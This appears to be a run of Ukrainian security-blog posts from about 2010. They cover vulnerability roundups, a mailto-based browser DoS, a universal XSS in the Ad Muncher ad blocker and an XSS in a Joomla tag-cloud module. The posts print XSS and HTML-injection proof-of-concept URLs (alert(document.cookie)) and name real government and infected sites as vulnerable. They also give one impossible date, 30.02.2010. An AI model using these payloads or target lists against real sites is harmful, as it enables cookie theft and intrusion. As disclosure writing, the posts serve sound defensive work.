Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• NetDecision TFTP Server 4.2 TFTP Directory Traversal (деталі)
• Multiple Stored XSS in XOOPS 2.4.4 Admin Section (деталі)
• LDF (Default.asp) Sql Injection Vulnerability (деталі)
• cmsmadesimple Multiple Security Issues : XSS+ LFI (деталі)
• Pogodny CMS SQL vulnerabilities (деталі)
• Pixel Portal Sql Injection Vulnerability (деталі)
• SQL injection vulnerability in Amelia CMS (деталі)
• Kusaba X <= 0.9 XSS/CSRF vulnerabilities (деталі)
• SphereCMS Blind SQL Injection Vulnerability (деталі)
• Vulnerabilities in gnutls (деталі)

30.02.2010 Мозілою була виправлена уразливість (невелика, що не представляє жодних секюріті ризиків, як вини висловилися), знайдена Henry Sudhof - Mozilla Foundation Security Advisory 2010-23 (Image src redirect to mailto: URL opens email editor). Що дозволяє через ридеректор, який перенаправляє на mailto: URL, відкривати емайл клієнт на комп’ютері користувача. Але виправлена дана уразливість була лише в Firefox 3.5.9, Firefox 3.6.2 та SeaMonkey 2.0.4, але не в Firefox 3.0.x.

Після того як я нещодавно прочитав даний advisory, я вирішив перевірити різні браузери. І як я перевірив, 16.05.2010, до даної уразливості вразливі веб браузери Firefox 3.0.19 і Opera 9.52. Та розробив експлоіт для проведення DoS атаки на Firefox.

Також я виявив можливість відкривати поштовий клієнт через iframe з mailto: URL. Яка працює в браузерах Firefox 3.0.19, IE6, IE8 та Chrome. Та розробив експлоіт для атаки на всі браузери, яку я назвав DoS через емайл (DoS via email). Дану атаку можна провести як з використанням JS, так і без нього (створивши сторінку з великою кількістю iframe).

Якщо атака через зображення на сторінці (що відкривають поштовий клієнт) є лише незручністю, то атака через зображення чи іфрейми з використанням моїх експлоітів є Denial of Service уразливістю. Вона відноситься до типу блокуючих DoS та DoS через споживання ресурсів. Дані експлоіти дуже небезпечні - при їх запуску, якщо вчасно не зупинити атаку, вони можуть призвести до повного вичерпання ресурсів комп’ютера (потенційно навіть до зависання системи).

DoS:

Firefox DoS Exploit.html

Даний експлоіт працює в Mozilla Firefox (Firefox <= 3.0.19, Firefox < 3.5.9, Firefox < 3.6.2) та SeaMonkey < 2.0.4.

Firefox, IE, Chrome & Opera DoS Exploit.html

Даний експлоіт працює в Mozilla Firefox (окрім 3.0.x та попередніх версій, він повинен працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180), Internet Explorer 8 (8.0.7600.16385), Google Chrome 1.0.154.48 та Opera 9.52. Причому в Opera експлоіт не визиває поштового клієнта, тому DoS атака відбувається без блокування, лише споживання ресурсів (більш повільне ніж в інших браузерах). А також даний експлоіт повинен працювати в SeaMonkey, Internet Explorer 7 та інших браузерах.

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.

Добірка цікавого чтива на тему web security (статті з Вікіпедії):

• Cross-site printing
• Cyber spying
• IDN homograph attack
• Referrer spoofing
• Remote File Inclusion

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://provinciyka.rv.ua - інфекція була виявлена 11.04.2010. Зараз сайт не входить до переліку підозрілих.
• http://gala.net - інфекція була виявлена 04.05.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 8 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://schlechtendahl.com.ua - інфекція була виявлена 08.05.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://mobilux.info - інфекція була виявлена 25.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://skytel.com.ua - інфекція була виявлена 16.05.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в Adobe Shockwave.

Уразливі версії: Adobe Shockwave Player 11.5.

Численні переповнення буфера, цілочисленні переповнення, пошкодження пам’яті, виконання коду.

• Adobe Shockwave Player Array Indexing Vulnerability (деталі)
• Adobe Shockwave Player Signedness Error Vulnerability (деталі)
• Adobe Shockwave Player 3D Parsing Memory Corruption (деталі)
• Abobe Shockwave Player Heap Memory Indexing Vulnerability (деталі)
• Adobe Shockwave Player Director File Parsing RCSL Pointer Overwrite (деталі)
• Security update available for Shockwave Player (деталі)
• Adobe Director Invalid Read (деталі)
• Adobe Shockwave Director PAMI Chunk Remote Code Execution Vulnerability (деталі)
• Adobe Shockwave Invalid Offset Memory Corruption Remote Code Execution Vulnerability (деталі)
• Adobe Shockwave Player 3D Parsing Memory Corruption Vulnerability (деталі)
• Adobe Shockwave Player Director File Parsing ATOM size infinite loop vulnerability (деталі)
• Adobe Shockwave Player Director File Parsing integer overflow vulnerability (деталі)

У червні 2006 року я знайшов Cross-Site Scripting уразливість в Ad Muncher. Про що найближчим часом повідомлю розробникам. Тоді в червні 2006 я активно займався пошуком XSS уразливостей і звернув увагу на те, що Ad Muncher створює XSS на сторінках (при вказанні XSS-коду в URL), в тому числі й на тих, де дірок немає.

Ad Muncher - це блокувальник реклами. Мій улюблений (яким я користуюся з 2003 року). На даний момент з 25.07.2003 Ad Muncher в мене на комп’ютері заблокував 1520201 рекламних банерів.

За допомогою даної уразливості можна провести XSS атаку на будь-який сайт, тому це універсальна XSS. Причому атака працює в будь-якому браузері, що є на комп’ютері жертви (так як Ad Muncher вміє працювати з будь-якими браузерами). Тому це найбільш небезпечний серед існуючих різновидів XSS. Головне, щоб жертва користувалася Ad Muncher.

Даний клас Cross-Site Cripting уразливостей я назвав Local XSS (Локальний XSS) - це Cross-Site Cripting уразливості в локальному програмному забезпеченні (на комп’ютері користувача, або в локальній мережі), які приводять до появи XSS уразливостей.

XSS:

Уразливість можлива через те, що програма вказує поточний URL в тілі поточної сторінки (без фільтрації тегів):

При запиті до http://site в тілі поточної сторінки маємо:
// Original URL: http://site

Можливі дві атаки (двох класів XSS уразливостей): reflected XSS та Post Persistent XSS (Saved XSS).

Як reflected XSS:

http://www.google.com/webhp?%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Як Saved XSS:

http://www.google.com/webhp?%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

При збереженні сторінки зі “спеціальним” URL, в коді сторінки зберігається XSS код. І відбувається виконання XSS коду при відкритті даної сторінки (причому її відкритті в будь-якому браузері, не тільки в тому, в якому вона зберігалася). Як я вже зазначав в статті про Saved XSS, дані уразливості можуть використовуватися для Code Execution через XSS атак.

Дана уразливість подібна до уразливостей в Internet Explorer (про яку я писав в серпні 2007), Chrome та Opera (про які я писав в жовтні 2008). Але зате вона працює в усіх браузерах, в тому числі навіть в тих браузерах де немає подібної уразливості.

Атака (обидві атаки) не спрацює лише в таких випадках:

1. Доступ до сайту відбувається через SSL (тобто на https-ресурсах).
2. Для даного сайта (на який відбувається атака) зроблений фільтр в програмі (Exclude filtering on site).
3. Для даного браузера (через який відбувається атака) в програмі зроблене відключення фільтрації.
4. Із-за глюка в програмі (іноді навіть для http-сайта програма зненацька може відключити фільтрацію).

Уразливі Ad Muncher v4.52 та попередні версії та деякі наступні версії. Я тестував на Ad Muncher v4.52. Сьогодні я викачав і перевірив на Ad Muncher v4.81 - дана версія не вразлива. Як я виявив в changelog.txt, дана уразливість була виправлена в версії Ad Muncher v4.71 (08.10.2007). Тому вразливі Ad Muncher v4.7 та попередні версії.

P.S.

Після публікації даного запису, я знайшов в Гуглі цікаву статтю. Як повідомили секюріті дослідники в своїй статті Detecting In-Flight Page Changes with Web Tripwires, вони в 2007 році (тобто через рік після мене) виявили дану уразливість в Ad Muncher (в своїх дослідженнях вони звернули увагу лише на reflected XSS, але не на Saved XSS). А також в Sidki та наборі фільтрів Grypen для Proxomitron.

Причому в Proxomitron можна було проводити атаки навіть на https-сайти. Про що вони повідомили розробникам даних програм ще восени 2007 року.

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 10 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві gov-сайти: www.aksaraydefterdarligi.gov.tr, www.ecdpw.gov.za, www.ilpks.gov.my, www.leics.gov.uk та www.nieveargentina.gov.ar.

Виявлені численні уразливості безпеки в PHP, що були оприлюднені під час проведення проекту Місяць безпеки PHP.

Уразливі версії: PHP 5.2, PHP 5.3.

Численні витоки інформації, звертання до неініціалізованої області пам’яті, подвійне звільнення пам’яті, цілочислене переповнення.

• Многочисленные уязвимости безопасности в PHP (деталі)

В даній добірці уразливості в веб додатках:

• HP Storage Essentials Running Secure NaviCLI, Remote Unauthorized Access, Gain Extended Privileges (деталі)
• Huski retail mulitple SQL injection vulnerabilities (деталі)
• HuskiCMS local file inclusion (деталі)
• Multiple vulnerabilities found in evalmsi 2.1.03 (деталі)
• New otrs2 packages fix SQL injection (деталі)
• Trustwave’s SpiderLabs Security Advisory TWSL2010-001 (деталі)
• SQL injection vulnerability in apemCMS (деталі)
• HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access (деталі)
• Information disclosure vulnerability in Drupal’s Realname User Reference Widget contributed module (version 6.x-1.0) (деталі)
• Joomla (Jw_allVideos) Remote File Download Vulnerability (деталі)

Раніше я вже писав про уразливість в плагіні tagcloud для Kasseler CMS. Така ж уразливість є і в модулі 3D user cloud (mod_democbusr3dcloud, mod_cbusr3dcloud та mod_usr3dcloud) для Joomla, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

У травні, 10.05.2010, я знайшов Cross-Site Scripting уразливість в модулі 3D user cloud для Joomla. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Існує три версії модуля: mod_democbusr3dcloud (демо версія) та mod_cbusr3dcloud і mod_usr3dcloud (повні версії). Флешки бувають tagcloud.swf та tagcloud_rus.swf.

XSS:

http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі всі версії 3D user cloud для Joomla.